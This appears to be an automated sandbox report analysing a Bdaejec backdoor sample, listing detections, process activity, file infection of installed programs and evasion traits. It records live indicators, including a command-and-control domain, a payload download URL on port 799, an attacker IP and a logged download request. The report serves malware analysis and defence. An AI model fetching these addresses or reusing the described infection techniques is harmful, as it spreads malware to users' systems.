Edit tour

Windows Analysis Report
gT6IitwToH.exe

Overview

General Information

Sample name:	gT6IitwToH.exe renamed because original name is a hash value
Original sample name:	8da10c130681fd03a6b64ad9a827a433.exe
Analysis ID:	1581652
MD5:	8da10c130681fd03a6b64ad9a827a433
SHA1:	55be25e240ff1eebca02e9db0f9cec91f03729c3
SHA256:	45c750869e31ed836f892cb85fe2d968146a3ae10261f1e28cef8e61b8265f55
Tags:	backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

gT6IitwToH.exe (PID: 5924 cmdline: "C:\Users\user\Desktop\gT6IitwToH.exe" MD5: 8DA10C130681FD03A6B64AD9A827A433)

IivJTsFD.exe (PID: 4908 cmdline: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 1860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: IivJTsFD.exe PID: 4908	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:23:59.200458+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.4	49730	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:23:57.549164+0100	2838522	1	Malware Command and Control Activity Detected	192.168.2.4	65103	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: gT6IitwToH.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.rarN	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar9	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/?ll	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/6lk	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarW	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarh	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: gT6IitwToH.exe	Virustotal: Detection: 88%			Perma Link
Source: gT6IitwToH.exe	ReversingLabs: Detection: 97%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: gT6IitwToH.exe

Joe Sandbox ML: detected

Source: gT6IitwToH.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_002529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_002529E2

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_00252B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00252B8C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:65103 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_00251099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00251099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: IivJTsFD.exe, 00000001.00000003.1653432103.00000000011E0000.00000004.00001000.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/6lk
Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/?ll
Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948793448.000000000130A000.00000004.00000010.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarN
Source: IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarW
Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: IivJTsFD.exe, 00000001.00000002.1948793448.000000000130A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarh
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_59130a50-7

System Summary

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: IivJTsFD.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_00417B71	0_2_00417B71
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_00407320	0_2_00407320
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Code function: 1_2_00256076	1_2_00256076
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Code function: 1_2_00256D00	1_2_00256D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Code function: String function: 0040379C appears 31 times

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: gT6IitwToH.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: IivJTsFD.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: IivJTsFD.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: IivJTsFD.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@1/1

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_0025119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_0025119F

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4908

Source: C:\Users\user\Desktop\gT6IitwToH.exe

File created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Jump to behavior

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Command line argument: Z@

0_2_00405A30

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gT6IitwToH.exe	Virustotal: Detection: 88%
Source: gT6IitwToH.exe	ReversingLabs: Detection: 97%

Source: unknown	Process created: C:\Users\user\Desktop\gT6IitwToH.exe "C:\Users\user\Desktop\gT6IitwToH.exe"
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Process created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Process created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Jump to behavior

Source: C:\Users\user\Desktop\gT6IitwToH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Unpacked PE file: 1.2.IivJTsFD.exe.250000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Code function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_00409607

Source: initial sample

Static PE information: section where entry point is pointing to: wu

Source: gT6IitwToH.exe	Static PE information: section name: wu
Source: IivJTsFD.exe.0.dr	Static PE information: section name: .aspack
Source: IivJTsFD.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_00416E7B push ebp; ret	0_2_00416E7E
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_00416E85 push 00000000h; ret	0_2_00417296
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_004037E1 push ecx; ret	0_2_004037F4
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Code function: 1_2_00251638 push dword ptr [00253084h]; ret	1_2_0025170E
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Code function: 1_2_0025600A push ebp; ret	1_2_0025600D
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Code function: 1_2_00256014 push 002514E1h; ret	1_2_00256425
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Code function: 1_2_00252D9B push ecx; ret	1_2_00252DAB

Source: gT6IitwToH.exe	Static PE information: section name: wu entropy: 6.935243059177517
Source: IivJTsFD.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.9345220483131635
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.934118582299783
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934618219465227

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\gT6IitwToH.exe	File created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

